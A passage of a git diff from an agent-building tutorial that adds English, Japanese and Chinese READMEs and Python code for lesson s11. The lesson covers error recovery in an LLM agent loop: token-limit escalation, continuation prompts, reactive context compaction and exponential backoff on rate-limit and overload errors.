"assistant", "content": response.content}) + + if response.stop_reason == "max_tokens": + # Path 1: escalate or continue + ... + continue + if response.stop_reason != "tool_use": + return + # ... tool execution ... +``` + +The outer try/except catches API exceptions (prompt_too_long, network errors), `with_retry` handles transient errors (429/529), and `stop_reason` checks handle truncation. Three recovery mechanisms, each handling its own error type. + +--- + +## Changes from s10 + +| Component | Before (s10) | After (s11) | +|-----------|-------------|-------------| +| Error handling | None (crashes on any error) | Three recovery patterns + exponential backoff | +| New constants | — | ESCALATED_MAX_TOKENS=64000, MAX_RETRIES=10, BASE_DELAY_MS=500 | +| New functions | — | with_retry, reactive_compact, RecoveryState | +| Tools | bash, read_file, write_file (3) | bash, read_file, write_file (3) — unchanged | +| Loop | Bare LLM call | Wrapped in try/except + continue retry | + +--- + +## Try It + +```sh +cd learn-claude-code +python s11_error_recovery/code.py +``` + +Try these prompts: + +1. Ask the Agent to generate a very long piece of code, and observe whether it automatically continues after truncation (look for the `[max_tokens] escalating` log) +2. Read many files consecutively to bloat the context, and observe reactive compact +3. If you encounter 429/529, observe the exponential backoff log output + +--- + +## What's Next + +The Agent can now automatically recover from errors. But the tasks it handles are still one-shot — you give it a task, it finishes, it's done. + +What if the Agent could manage a **task list** — with dependencies, persisted to disk, resumable across sessions? A TODO list is not a task system. + +s12 Task System → Tasks form a dependency graph with state and persistence. This is the foundation for multi-Agent collaboration. + +
+Deep Dive into CC Source + +> The following is based on a complete analysis of CC source code: `query.ts` (1729 lines), `withRetry.ts`, and `tokenBudget.ts`. + +### 1. 13+ Reason Codes (Not Just 3) + +The teaching version covers 3 of the most common recovery patterns. CC actually has 13+ reason codes, evaluated after every LLM call: + +| Reason Code | Teaching Version | CC Behavior | +|---|---|---| +| `completed` | Normal completion | Return result | +| `max_output_tokens_escalate` | Path 1 | 8K→64K escalation | +| `max_output_tokens_recovery` | Path 1 continuation | Continuation prompt (up to 3 times) | +| `reactive_compact_retry` | Path 2 | Reactive compact → retry | +| `prompt_too_long` | Path 2 | Same as above | +| `model_error` | Not covered | Retry | +| `image_error` | Not covered | `ImageSizeError` / `ImageResizeError` handled specifically | +| `aborted_streaming` | Not covered | Streaming abort recovery | +| `stop_hook_blocking` | Not covered | Inject blocking error → model self-corrects | +| `stop_hook_prevented` | Not covered | Hooks prevent execution | +| `token_budget_continuation` | Not covered | Continue when token usage < 90% | +| `blocking_limit` | Not covered | Blocking limit reached | +| `collapse_drain_retry` | Not covered | Context collapse — commit staged content first | + +The teaching version only expands on the first 5 (most common); each of the rest has its own dedicated handling logic. + +### 2. Precise Exponential Backoff Formula + +CC's backoff delay (`withRetry.ts:530-548`): + +``` +delay = min(500 × 2^(attempt-1), 32000) + random(0~25%) +``` + +| Attempt | Base Delay | + Jitter | +|---------|-----------|----------| +| 1 | 500ms | 0-125ms | +| 2 | 1000ms | 0-250ms | +| 4 | 4000ms | 0-1000ms | +| 7+ | 32000ms (cap) | 0-8000ms | + +If the server returns a `Retry-After` header, that value takes priority. + +### 3. Original CONTINUATION Prompt + +CC's continuation prompt (`query.ts:1225-1227`): + +``` +Output token limit hit. Resume directly — no apology, no recap of what +you were doing. Pick up mid-thought if that is where the cut happened. +Break remaining work into smaller pieces. +``` + +Token budget nudge prompt (`tokenBudget.ts:72`): + +``` +Stopped at {pct}% of token target. Keep working — do not summarize. +``` + +### 4. Streaming Error Handling + +In CC's streaming path, recoverable errors (413, max_tokens, media errors) are **withheld from display** during streaming (`query.ts:799-822`) — SDK consumers don't see them, only the recovery logic does. After streaming ends, the system determines whether recovery is needed. + +### 5. 529 → Fallback Model Switch + +After 3 consecutive 529 overload errors (`MAX_529_RETRIES = 3`), CC automatically switches to the fallback model (e.g., Opus → Sonnet). On switch, all pending messages and tool results are cleared, and the user sees "Switched to {model} due to high demand". + +### 6. Diminishing Returns Detection + +Token budget "continuations" aren't unlimited. When there are 3 consecutive continuations with a token increment < 500, the system determines "continuing won't produce meaningful output" and stops continuation (`tokenBudget.ts:60-62`). + +
+ + diff --git a/s11_error_recovery/README.ja.md b/s11_error_recovery/README.ja.md new file mode 100644 index 000000000..270fa17d5 --- /dev/null +++ b/s11_error_recovery/README.ja.md @@ -0,0 +1,257 @@ +# s11: Error Recovery — エラーは終わりではなく、リトライの始まり + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s09 → s10 → `s11` → [s12](../s12_task_system/) → s13 → ... → s19 +> *"エラーは終わりではなく、リトライの始まり"* — トークン拡張、コンテキスト圧縮、モデル切り替え。 +> +> **Harness 層**: 耐障害性 — メインループのエラーを分類し復旧。 + +--- + +## 課題 + +Agent が動いている途中でエラーが出た: + +``` +Error: 529 overloaded +``` + +Agent がクラッシュした。リトライもしない、モデルも切り替えない、コンテキストも減らさない——そのままクラッシュ。 + +本番環境では API エラーが日常茶飯事。最も一般的な 3 つの障害パターン:**出力の切り詰め**(モデルが途中まで出力して token が尽きた)、**コンテキスト超過**(圧縮後も長すぎる)、**一時的障害**(429 レート制限 / 529 過負荷 / ネットワーク断)。エラーを処理しない Agent は、一度触れただけで止まる車のようなものだ。 + +--- + +## 解決策 + +![Error Recovery Overview](images/error-recovery-overview.ja.svg) + +s10 のループ、prompt 組み立てはすべてそのまま。唯一の変更点:LLM 呼び出しを try/except で包み、エラータイプに応じて異なる復旧パスに振り分ける。復旧後は `continue` でループ先頭に戻り、再度 LLM を呼び出す。 + +最も一般的な 3 つの復旧パターン(CC には実際 13 以上の reason code があるが、残りは Deep dive で解説): + +| パターン | トリガー | 復旧アクション | +|----------|----------|---------------| +| 出力切り詰め | `max_tokens` | 8K→64K に拡張 / 続きのプロンプト注入 | +| コンテキスト超過 | `prompt_too_long` | reactive compact → リトライ | +| 一時的障害 | 429 / 529 | 指数バックオフ + ジッター | + +--- + +## 仕組み + +### パス 1: 出力が切り詰められた + +モデルが途中まで出力して、`max_tokens` に達した。デフォルトの 8000 token では完全な回答を出力しきれない。 + +初回発生時、`max_tokens` を 8K から 64K に拡張(8 倍の空間)し、同じリクエストをリトライする。64K でも足りない場合、続きのプロンプトを注入してモデルに先ほどの続きを出力させる。最大 3 回まで: + +```python +ESCALATED_MAX_TOKENS = 64000 + +if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. Pick up mid-thought."}) + state.recovery_count += 1 + continue +``` + +拡張は 1 回だけ、続きの出力は最大 3 回。超過したら終了——これ以上続けても実質的な出力は得られない。 + +### パス 2: コンテキスト超過 + +LLM が「コンテキストが長すぎる」と返す(`prompt_too_long`)。s08 の 4 層圧縮をすべて実行したのに、まだ超えている。 + +reactive compact をトリガー——auto compact よりも積極的で、最後の 5 メッセージ + 要約だけを残す。圧縮後にリトライ。ただし、一度圧縮してもまだ超過している場合は終了するしかない——再度圧縮しても小さくはならない: + +```python +except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return # 圧縮済みでも超過、終了するしかない +``` + +### パス 3: 一時的障害 + +ネットワークの揺らぎ、429 レート制限、529 過負荷——これらはバグではなく、分散システムの日常だ。 + +指数バックオフ + ジッター:1 回目は 0.5 秒待機、2 回目は 1 秒、3 回目は 2 秒、最大 10 回。ランダムジッターを加えることで、並行リクエストが同時にリトライするのを防ぐ。3 回連続で 529 過負荷 → フォールバックモデルに切り替え: + +```python +def with_retry(fn, state, max_retries=10): + for attempt in range(max_retries): + try: + return fn() + except RateLimitError: + delay = min(500 * (2 ** attempt), 32000) + random_jitter() + time.sleep(delay / 1000) + except OverloadedError: + state.consecutive_529 += 1 + if state.consecutive_529 >= 3: + switch_to_fallback_model() + time.sleep(500 / 1000) + raise MaxRetriesExceeded() +``` + +バックオフの公式:`min(500 × 2^attempt, 32000) + random(0~25%)`。サーバーが `Retry-After` ヘッダーを返した場合、その値を優先して使用する。 + +### 統合して実行 + +```python +def agent_loop(messages, context): + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = 8000 + + while True: + try: + response = with_retry( + lambda: client.messages.create( + model=MODEL, system=system, + messages=messages, tools=TOOLS, + max_tokens=max_tokens), + state) + except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return + except Exception as e: + log_error(e) + return + + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason == "max_tokens": + # Path 1: escalate or continue + ... + continue + if response.stop_reason != "tool_use": + return + # ... tool execution ... +``` + +外側の try/except が API 例外(prompt_too_long、ネットワークエラー)を捕捉し、`with_retry` が一時的エラー(429/529)を処理し、`stop_reason` のチェックが切り詰めを処理する。3 つの復旧メカニズムがそれぞれ異なるエラータイプを担当する。 + +--- + +## s10 からの変更点 + +| コンポーネント | 変更前 (s10) | 変更後 (s11) | +|---------------|-------------|-------------| +| エラー処理 | なし(エラーで即クラッシュ) | 3 つの復旧パターン + 指数バックオフ | +| 新規定数 | — | ESCALATED_MAX_TOKENS=64000, MAX_RETRIES=10, BASE_DELAY_MS=500 | +| 新規関数 | — | with_retry, reactive_compact, RecoveryState | +| ツール | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 変更なし | +| ループ | LLM を直接呼び出し | try/except で包み + continue でリトライ | + +--- + +## 試してみる + +```sh +cd learn-claude-code +python s11_error_recovery/code.py +``` + +以下の prompt を試してみよう: + +1. Agent に長いコードを生成させ、切り詰め後に自動で続きが出力されるか観察する(`[max_tokens] escalating` ログを確認) +2. 連続して大量のファイルを読み込みコンテキストを肥大化させ、reactive compact の動作を観察する +3. 429/529 が発生した場合、指数バックオフのログ出力を観察する + +--- + +## 次のステップ + +Agent はエラーから自動的に復旧できるようになった。しかし、まだ処理するタスクは「使い捨て」だ——タスクを与えると実行し、終わる。 + +Agent に**タスクリスト**を管理させられないだろうか——依存関係があり、ディスクに永続化され、セッションをまたいで復旧できる?TODO リストはタスクシステムではない。 + +s12 Task System → タスクとは依存関係があり、状態があり、永続化されたグラフだ。これはマルチ Agent 協調の基盤となる。 + +
+CC ソースコード深掘り + +> 以下は CC ソースコード `query.ts`(1729 行)、`withRetry.ts`、`tokenBudget.ts` の完全分析に基づく。 + +### 一、13 以上の reason code(3 つだけではない) + +教学版では最も一般的な 3 つの復旧パターンを解説した。CC には実際 13 以上の reason code があり、毎回の LLM 呼び出し後に判定される: + +| reason code | 教学版の対応 | CC の動作 | +|---|---|---| +| `completed` | 正常終了 | 結果を返す | +| `max_output_tokens_escalate` | パス 1 | 8K→64K に拡張 | +| `max_output_tokens_recovery` | パス 1 続き出力 | 続きのプロンプト注入(最大 3 回) | +| `reactive_compact_retry` | パス 2 | reactive compact → リトライ | +| `prompt_too_long` | パス 2 | 同上 | +| `model_error` | 未展開 | リトライ | +| `image_error` | 未展開 | `ImageSizeError` / `ImageResizeError` の専用処理 | +| `aborted_streaming` | 未展開 | ストリーミング中断の復旧 | +| `stop_hook_blocking` | 未展開 | blocking error を注入 → モデルが自己修正 | +| `stop_hook_prevented` | 未展開 | hooks によるブロック | +| `token_budget_continuation` | 未展開 | token 使用量 < 90% の時に継続 | +| `blocking_limit` | 未展開 | ブロック制限 | +| `collapse_drain_retry` | 未展開 | context collapse 時にまず保留中の内容をコミット | + +教学版では最初の 5 つ(最も一般的なもの)だけを展開した。残りはそれぞれ専用の処理ロジックを持つ。 + +### 二、指数バックオフの正確な公式 + +CC のバックオフ遅延(`withRetry.ts:530-548`): + +``` +delay = min(500 × 2^(attempt-1), 32000) + random(0~25%) +``` + +| 試行 | 基本遅延 | + ジッター | +|------|---------|-----------| +| 1 | 500ms | 0-125ms | +| 2 | 1000ms | 0-250ms | +| 4 | 4000ms | 0-1000ms | +| 7+ | 32000ms(上限) | 0-8000ms | + +サーバーが `Retry-After` ヘッダーを返した場合、その値を優先して使用する。 + +### 三、CONTINUATION プロンプト原文 + +CC の続き出力プロンプト(`query.ts:1225-1227`): + +``` +Output token limit hit. Resume directly — no apology, no recap of what +you were doing. Pick up mid-thought if that is where the cut happened. +Break remaining work into smaller pieces. +``` + +Token budget のナッジプロンプト(`tokenBudget.ts:72`): + +``` +Stopped at {pct}% of token target. Keep working — do not summarize. +``` + +### 四、ストリーミングエラー処理 + +CC のストリーミングパスでは、復旧可能なエラー(413、max_tokens、media error)はストリーミング中**表示を保留される**(`query.ts:799-822`)——SDK コンシューマーには見えず、復旧ロジックだけが認識できる。ストリーミング終了後に復旧が必要かどうかを判断する。 + +### 五、529 → フォールバックモデル切り替え + +3 回連続で 529 過負荷エラーが発生した後(`MAX_529_RETRIES = 3`)、CC は自動的にフォールバックモデルに切り替える(例:Opus → Sonnet)。切り替え時にすべての保留中のメッセージと tool 結果をクリアし、ユーザーに "Switched to {model} due to high demand" と表示する。 + +### 六、収穫逓減の検出 + +Token budget の「継続」は無限ではない。連続 3 回の continuation で token 増分が 500 未満の場合、システムは「続けても実質的な出力は得られない」と判断し、continuation を停止する(`tokenBudget.ts:60-62`)。 + +
+ + diff --git a/s11_error_recovery/README.md b/s11_error_recovery/README.md new file mode 100644 index 000000000..75478e926 --- /dev/null +++ b/s11_error_recovery/README.md @@ -0,0 +1,257 @@ +# s11: Error Recovery — 错误不是结束,是重试的开始 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → ... → s09 → s10 → `s11` → [s12](../s12_task_system/) → s13 → ... → s19 +> *"错误不是终点, 是重试的起点"* — 升级 token、压缩上下文、切换模型。 +> +> **Harness 层**: 韧性 — 主循环遇到错误时分类并恢复。 + +--- + +## 问题 + +Agent 跑着跑着报错了: + +``` +Error: 529 overloaded +``` + +Agent 崩溃了。它没有重试,没有换模型,没有减少上下文——直接崩溃。 + +生产环境中 API 错误是常态。三种最常见的故障模式:**输出被截断**(模型话说一半 token 用完了)、**上下文超限**(压缩后还是太长)、**临时故障**(429 限流 / 529 过载 / 网络断了)。一个不处理错误的 Agent 就像一个一碰就熄火的车。 + +--- + +## 解决方案 + +![Error Recovery Overview](images/error-recovery-overview.svg) + +s10 的循环、prompt 组装全部保留。唯一的变动:LLM 调用包裹在 try/except 里,根据错误类型走不同的恢复路径。恢复后 `continue` 回到循环开头重新调用 LLM。 + +三种最常见的恢复模式(CC 实际有 13+ reason code,其余见 Deep dive): + +| 模式 | 触发 | 恢复动作 | +|------|------|---------| +| 输出截断 | `max_tokens` | 升级 8K→64K / 续写提示 | +| 上下文超限 | `prompt_too_long` | reactive compact → 重试 | +| 临时故障 | 429 / 529 | 指数退避 + 抖动 | + +--- + +## 工作原理 + +### 路径 1: 输出被截断 + +模型话说一半,`max_tokens` 用完了。默认 8000 token 不够它输出完整回答。 + +第一次发生时,直接把 `max_tokens` 从 8K 升级到 64K(8 倍空间),重试同一请求。如果 64K 还是不够,注入续写提示让模型接着刚才的话继续说,最多 3 次: + +```python +ESCALATED_MAX_TOKENS = 64000 + +if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. Pick up mid-thought."}) + state.recovery_count += 1 + continue +``` + +升级只有一次机会,续写最多 3 次。超过就退出——继续续写也不会有实质产出。 + +### 路径 2: 上下文超限 + +LLM 说"你的上下文太长了"(`prompt_too_long`)。s08 的四层压缩全跑过了,还是超。 + +触发 reactive compact——比 auto compact 更激进,只保留最后 5 条消息 + 摘要。压缩后重试。但如果压缩过一次还是超限,只能退出——再压缩也不会变小: + +```python +except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return # 压缩过了还是超限,只能退出 +``` + +### 路径 3: 临时故障 + +网络抖动、429 限流、529 过载——这些不是 bug,是分布式系统的常态。 + +指数退避 + 抖动:第一次等 0.5 秒,第二次等 1 秒,第三次等 2 秒,最多 10 次。加随机抖动让并发请求不在同一时刻重试。连续 3 次 529 过载 → 切换到备用模型: + +```python +def with_retry(fn, state, max_retries=10): + for attempt in range(max_retries): + try: + return fn() + except RateLimitError: + delay = min(500 * (2 ** attempt), 32000) + random_jitter() + time.sleep(delay / 1000) + except OverloadedError: + state.consecutive_529 += 1 + if state.consecutive_529 >= 3: + switch_to_fallback_model() + time.sleep(500 / 1000) + raise MaxRetriesExceeded() +``` + +退避公式:`min(500 × 2^attempt, 32000) + random(0~25%)`。如果服务器返回 `Retry-After` header,优先用那个值。 + +### 合起来跑 + +```python +def agent_loop(messages, context): + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = 8000 + + while True: + try: + response = with_retry( + lambda: client.messages.create( + model=MODEL, system=system, + messages=messages, tools=TOOLS, + max_tokens=max_tokens), + state) + except PromptTooLongError: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + return + except Exception as e: + log_error(e) + return + + messages.append({"role": "assistant", "content": response.content}) + + if response.stop_reason == "max_tokens": + # Path 1: escalate or continue + ... + continue + if response.stop_reason != "tool_use": + return + # ... tool execution ... +``` + +外层 try/except 捕获 API 异常(prompt_too_long、网络错误),`with_retry` 处理瞬态错误(429/529),`stop_reason` 检查处理截断。三种恢复机制各管各的错误类型。 + +--- + +## 相对 s10 的变更 + +| 组件 | 之前 (s10) | 之后 (s11) | +|------|-----------|-----------| +| 错误处理 | 无(一碰就崩溃) | 三种恢复模式 + 指数退避 | +| 新常量 | — | ESCALATED_MAX_TOKENS=64000, MAX_RETRIES=10, BASE_DELAY_MS=500 | +| 新函数 | — | with_retry, reactive_compact, RecoveryState | +| 工具 | bash, read_file, write_file (3) | bash, read_file, write_file (3) — 不变 | +| 循环 | 裸调用 LLM | try/except 包裹 + continue 重试 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s11_error_recovery/code.py +``` + +试试这些 prompt: + +1. 让 Agent 生成一段很长的代码,观察截断后是否自动续写(看 `[max_tokens] escalating` 日志) +2. 连续读取大量文件撑大上下文,观察 reactive compact +3. 如果遇到 429/529,观察指数退避的日志输出 + +--- + +## 接下来 + +Agent 现在能在错误中自动恢复了。但它处理的任务仍然是"一次性"的——你给它一个任务,它做完,结束。 + +能不能让 Agent 管理一个**任务列表**——有依赖关系、持久化到磁盘、跨会话能恢复?TODO 列表不是任务系统。 + +s12 Task System → 任务是有依赖、有状态、持久化的图。这是多 Agent 协作的基础。 + +
+深入 CC 源码 + +> 以下基于 CC 源码 `query.ts`(1729 行)、`withRetry.ts`、`tokenBudget.ts` 的完整分析。 + +### 一、13+ reason code(不只是 3 条) + +教学版讲了 3 种最常见的恢复模式。CC 实际有 13+ reason code,每轮 LLM 调用后都会判断: + +| reason code | 教学版对应 | CC 行为 | +|---|---|---| +| `completed` | 正常完成 | 返回结果 | +| `max_output_tokens_escalate` | 路径 1 | 8K→64K 升级 | +| `max_output_tokens_recovery` | 路径 1 续写 | 续写提示(最多 3 次) | +| `reactive_compact_retry` | 路径 2 | reactive compact → 重试 | +| `prompt_too_long` | 路径 2 | 同上 | +| `model_error` | 未展开 | 重试 | +| `image_error` | 未展开 | `ImageSizeError` / `ImageResizeError` 专门处理 | +| `aborted_streaming` | 未展开 | 流式中止恢复 | +| `stop_hook_blocking` | 未展开 | 注入 blocking error → 模型自纠 | +| `stop_hook_prevented` | 未展开 | hooks 阻止 | +| `token_budget_continuation` | 未展开 | token 用量 < 90% 时继续 | +| `blocking_limit` | 未展开 | 阻塞限制 | +| `collapse_drain_retry` | 未展开 | context collapse 先提交暂存 | + +教学版只展开了前 5 种(最常见的),其余各有专门处理逻辑。 + +### 二、指数退避的精确公式 + +CC 的退避延迟(`withRetry.ts:530-548`): + +``` +delay = min(500 × 2^(attempt-1), 32000) + random(0~25%) +``` + +| 尝试 | 基础延迟 | + 抖动 | +|------|---------|--------| +| 1 | 500ms | 0-125ms | +| 2 | 1000ms | 0-250ms | +| 4 | 4000ms | 0-1000ms | +| 7+ | 32000ms(上限) | 0-8000ms | + +如果服务器返回 `Retry-After` header,优先用那个值。 + +### 三、CONTINUATION 提示原文 + +CC 的续写提示(`query.ts:1225-1227`): + +``` +Output token limit hit. Resume directly — no apology, no recap of what +you were doing. Pick up mid-thought if that is where the cut happened. +Break remaining work into smaller pieces. +``` + +Token budget 的 nudge 提示(`tokenBudget.ts:72`): + +``` +Stopped at {pct}% of token target. Keep working — do not summarize. +``` + +### 四、流式错误处理 + +CC 的流式路径中,可恢复的错误(413、max_tokens、media error)在 streaming 期间**被暂扣不展示**(`query.ts:799-822`)——SDK 消费者看不到,只有恢复逻辑能看到。等 streaming 结束后才判断是否需要恢复。 + +### 五、529 → Fallback Model 切换 + +连续 3 次 529 过载错误后(`MAX_529_RETRIES = 3`),CC 自动切换到 fallback model(如 Opus → Sonnet)。切换时清除所有 pending 消息和 tool 结果,给用户展示 "Switched to {model} due to high demand"。 + +### 六、Diminishing Returns 检测 + +Token budget 的"继续"不是无限的。当连续 3 次 continuation 且 token 增量 < 500 时,系统判断"继续也没有实质性产出",停止 continuation(`tokenBudget.ts:60-62`)。 + +
+ + diff --git a/s11_error_recovery/code.py b/s11_error_recovery/code.py new file mode 100644 index 000000000..7e1c7a0cf --- /dev/null +++ b/s11_error_recovery/code.py @@ -0,0 +1,313 @@ +#!/usr/bin/env python3 +""" +s11: Error Recovery — try/except with three recovery paths + exponential backoff. + +Run: python s11_error_recovery/code.py +Need: pip install anthropic python-dotenv + .env with ANTHROPIC_API_KEY + +Changes from s10: + - LLM call wrapped in try/except with three recovery paths + - Path 1: max_tokens -> escalate 8K->64K or continue prompt (max 3) + - Path 2: prompt_too_long -> reactive compact -> retry (once) + - Path 3: 429/529 -> exponential backoff with jitter (max 10) + - with_retry wrapper for transient errors + - RecoveryState tracks escalation / compact / 529 counters + +ASCII flow: + messages -> prompt assembly -> compress+load -> [try] LLM [except] -> tools -> loop + | | + stop_reason error type + max_tokens? prompt_too_long? -> compact + escalate / 429/529? -> backoff + continue other? -> log + exit +""" + +import os, subprocess, time, random +from pathlib import Path + +try: + import readline + readline.parse_and_bind('set bind-tty-special-chars off') +except ImportError: + pass + +from anthropic import Anthropic +from dotenv import load_dotenv + +load_dotenv(override=True) +if os.getenv("ANTHROPIC_BASE_URL"): + os.environ.pop("ANTHROPIC_AUTH_TOKEN", None) + +WORKDIR = Path.cwd() +client = Anthropic(base_url=os.getenv("ANTHROPIC_BASE_URL")) +MODEL = os.environ["MODEL_ID"] + +# ── Constants ── + +ESCALATED_MAX_TOKENS = 64000 +DEFAULT_MAX_TOKENS = 8000 +MAX_RECOVERY_RETRIES = 3 +MAX_RETRIES = 10 +BASE_DELAY_MS = 500 +MAX_CONSECUTIVE_529 = 3 + +# ── Prompt Assembly (from s10, unchanged) ── + +PROMPT_SECTIONS = { + "identity": "You are a coding agent. Act, don't explain.", + "tools": "Available tools: bash, read, write, edit, glob...", + "workspace": f"Working directory: {WORKDIR}", + "planning": "For multi-step tasks, use todo_write first.", + "skills": "Skills are on demand: list_skills → load_skill.", + "memory": "Relevant memories are injected below when available.", +} + + +def assemble_system_prompt(context: dict) -> str: + sections = [PROMPT_SECTIONS["identity"], + PROMPT_SECTIONS["tools"], + PROMPT_SECTIONS["workspace"]] + if context.get("has_todos"): + sections.append(PROMPT_SECTIONS["planning"]) + if context.get("has_skills"): + sections.append(PROMPT_SECTIONS["skills"]) + if context.get("memories"): + sections.append(f"Relevant memories:\n{context['memories']}") + return "\n\n".join(sections) + + +_last_context_hash, _last_prompt = None, None + + +def get_system_prompt(context: dict) -> str: + global _last_context_hash, _last_prompt + h = hash(frozenset(context.items())) + if h == _last_context_hash and _last_prompt: + return _last_prompt + _last_context_hash, _last_prompt = h, assemble_system_prompt(context) + return _last_prompt + + +# ── Tools (unchanged) ── + +def safe_path(p: str) -> Path: + path = (WORKDIR / p).resolve() + if not path.is_relative_to(WORKDIR): + raise ValueError(f"Path escapes workspace: {p}") + return path + + +def run_bash(command: str) -> str: + try: + r = subprocess.run(command, shell=True, cwd=WORKDIR, + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + + +def run_read(path: str, limit: int | None = None) -> str: + try: + lines = safe_path(path).read_text().splitlines() + if limit and limit < len(lines): + lines = lines[:limit] + [f"... ({len(lines) - limit} more lines)"] + return "\n".join(lines) + except Exception as e: + return f"Error: {e}" + + +def run_write(path: str, content: str) -> str: + try: + file_path = safe_path(path) + file_path.parent.mkdir(parents=True, exist_ok=True) + file_path.write_text(content) + return f"Wrote {len(content)} bytes to {path}" + except Exception as e: + return f"Error: {e}" + + +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", + "input_schema": {"type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"]}}, + {"name": "read_file", "description": "Read file contents.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "limit": {"type": "integer"}}, + "required": ["path"]}}, + {"name": "write_file", "description": "Write content to a file.", + "input_schema": {"type": "object", + "properties": {"path": {"type": "string"}, + "content": {"type": "string"}}, + "required": ["path", "content"]}}, +] + +TOOL_HANDLERS = {"bash": run_bash, "read_file": run_read, "write_file": run_write} + + +# ── Error Recovery (s11 new) ── + +class RecoveryState: + """Track recovery attempts across the loop.""" + def __init__(self): + self.has_escalated = False + self.recovery_count = 0 + self.consecutive_529 = 0 + self.has_attempted_reactive_compact = False + + +def with_retry(fn, state: RecoveryState): + """Exponential backoff for transient errors (429/529). + Non-transient errors are re-raised for the outer handler.""" + for attempt in range(MAX_RETRIES): + try: + result = fn() + state.consecutive_529 = 0 + return result + except Exception as e: + name = type(e).__name__ + msg = str(e).lower() + + # Path 3a: 429 rate limit -> exponential backoff + if "ratelimit" in name.lower() or "429" in msg: + delay_s = min(BASE_DELAY_MS * (2 ** attempt), 32000) / 1000 + jitter = random.uniform(0, delay_s * 0.25) + print(f" \033[33m[429 rate limit] retry {attempt+1}/{MAX_RETRIES}," + f" wait {delay_s:.1f}s\033[0m") + time.sleep(delay_s + jitter) + continue + + # Path 3b: 529 overloaded -> fixed delay + model switch + if "overloaded" in name.lower() or "529" in msg or "overloaded" in msg: + state.consecutive_529 += 1 + if state.consecutive_529 >= MAX_CONSECUTIVE_529: + print(f" \033[31m[529 x{state.consecutive_529}]" + f" would switch model (CC behavior)\033[0m") + state.consecutive_529 = 0 + time.sleep(BASE_DELAY_MS / 1000) + continue + + # Not transient -> re-raise for outer try/except + raise + raise RuntimeError(f"Max retries ({MAX_RETRIES}) exceeded") + + +def reactive_compact(messages: list) -> list: + """Emergency compact — keep only last 5 messages + summary.""" + print(" \033[31m[reactive compact] trimming to last 5 messages\033[0m") + tail = messages[-5:] + return [{"role": "user", + "content": "[Reactive compact] Earlier conversation trimmed. " + "Continue from where you left off."}, *tail] + + +# ── Context ── + +def update_context(context: dict, messages: list) -> dict: + text = " ".join(str(m.get("content", ""))[:200] + for m in messages[-6:]).lower() + return {"has_todos": "todo" in text, + "has_skills": "skill" in text, + "memories": context.get("memories", "")} + + +# ── Agent Loop ── + +def agent_loop(messages: list, context: dict): + """Main loop with error recovery wrapping LLM calls.""" + system = get_system_prompt(context) + state = RecoveryState() + max_tokens = DEFAULT_MAX_TOKENS + + while True: + # ── LLM call: with_retry handles 429/529, outer handles rest ── + try: + response = with_retry( + lambda mt=max_tokens: client.messages.create( + model=MODEL, system=system, messages=messages, + tools=TOOLS, max_tokens=mt), + state) + except Exception as e: + name = type(e).__name__ + msg = str(e).lower() + + # Path 2: prompt_too_long -> reactive compact (once) + if "prompt" in msg and "long" in msg: + if not state.has_attempted_reactive_compact: + messages[:] = reactive_compact(messages) + state.has_attempted_reactive_compact = True + continue + print(" \033[31m[unrecoverable] still too long after compact\033[0m") + messages.append({"role": "assistant", "content": [ + {"type": "text", + "text": "[Error] Context too large, cannot continue."}]}) + return + + # Unrecoverable + print(f" \033[31m[unrecoverable] {name}: {str(e)[:100]}\033[0m") + messages.append({"role": "assistant", "content": [ + {"type": "text", "text": f"[Error] {name}: {str(e)[:200]}"}]}) + return + + messages.append({"role": "assistant", "content": response.content}) + + # ── Path 1: max_tokens -> escalate or continue ── + if response.stop_reason == "max_tokens": + if not state.has_escalated: + max_tokens = ESCALATED_MAX_TOKENS + state.has_escalated = True + print(f" \033[33m[max_tokens] escalating" + f" {DEFAULT_MAX_TOKENS} -> {ESCALATED_MAX_TOKENS}\033[0m") + continue + if state.recovery_count < MAX_RECOVERY_RETRIES: + messages.append({"role": "user", "content": + "Output token limit hit. Resume directly — " + "no apology, no recap. Pick up mid-thought."}) + state.recovery_count += 1 + print(f" \033[33m[max_tokens] continuation" + f" {state.recovery_count}/{MAX_RECOVERY_RETRIES}\033[0m") + continue + print(" \033[31m[max_tokens] recovery limit reached\033[0m") + return + + if response.stop_reason != "tool_use": + return + + # ── Tool execution ── + results = [] + for block in response.content: + if block.type != "tool_use": + continue + print(f"\033[36m> {block.name}\033[0m") + handler = TOOL_HANDLERS.get(block.name) + output = handler(**block.input) if handler else f"Unknown: {block.name}" + print(str(output)[:200]) + results.append({"type": "tool_result", + "tool_use_id": block.id, "content": output}) + messages.append({"role": "user", "content": results}) + + context = update_context(context, messages) + system = get_system_prompt(context) + + +if __name__ == "__main__": + print("s11: error recovery") + print("Enter a question, press Enter to send. Type q to quit.\n") + history = [] + context = {"has_todos": False, "has_skills": False, "memories": ""} + while True: + try: + query = input("\033[36ms11 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", 